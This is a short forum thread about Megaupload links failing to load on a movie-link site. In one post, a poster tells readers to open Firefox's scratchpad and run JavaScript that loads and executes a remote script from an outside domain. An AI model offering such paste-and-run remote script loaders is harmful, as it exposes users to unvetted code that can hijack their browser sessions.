visit the old forum
search for: in: entire forum this post
you are here: root => General Discussion => Megaupload having issues today
folders:
replies:

Megaupload having issues today

Ive noticed that today it is very hard(impossible) to open a megaupload page. It just keeps trying to load forever but never gets there. Thats a lot of good links that are beeing unusable because of this problem. Hope they fix their site soon!!!

Hard day for the hosts. Megaupload wont work, all other hosts that ive tried were very slow cant get anything to watch for the moment i have 2 movies slowly loading.... one of those sundays..

----------------edit
actually i tried the megaupload page a few minutes later and that time it worked just fine, looks like the problem is intermittent. If you have this problem just keep trying to open the page every few minutes and it will end up working.

wassaa
post #137 permalink
please login to reply
a guest
why have megaupload links no longer worging? the countdown still occurs but when you copy and paste the link after countdown has finished, nothing happens. every megaupload link is the same. this has been the same for the last few days that ive noticed.
post #162 permalink
folders:
replies:
Ok I am noticing that this is a new problem caused by the new securities implemented in Firefox 6. But I have found a workaround:

Press Shift+F4
paste this code in the box:
code:
var s=document.createElement("script");
s.setAttribute("type","text/javascript");
s.setAttribute("src","http://watchadownload.com/mustream.js?v=1.02");
document.getElementsByTagName("head")[0].appendChild(s);

and click execute->run

wassaa
post #163 permalink
folders:
replies:
Where do I find the Megaupload page in my apple Tv?

Tx.
post #171 permalink
folders:
replies:
Sorry I cant support Apple TV cos I dont have one and do not even know what its supposed to do... Any Apple TV users out there can share their experience using GO Moviez on Apple TV? is that even possible?

wassaa
post #173 permalink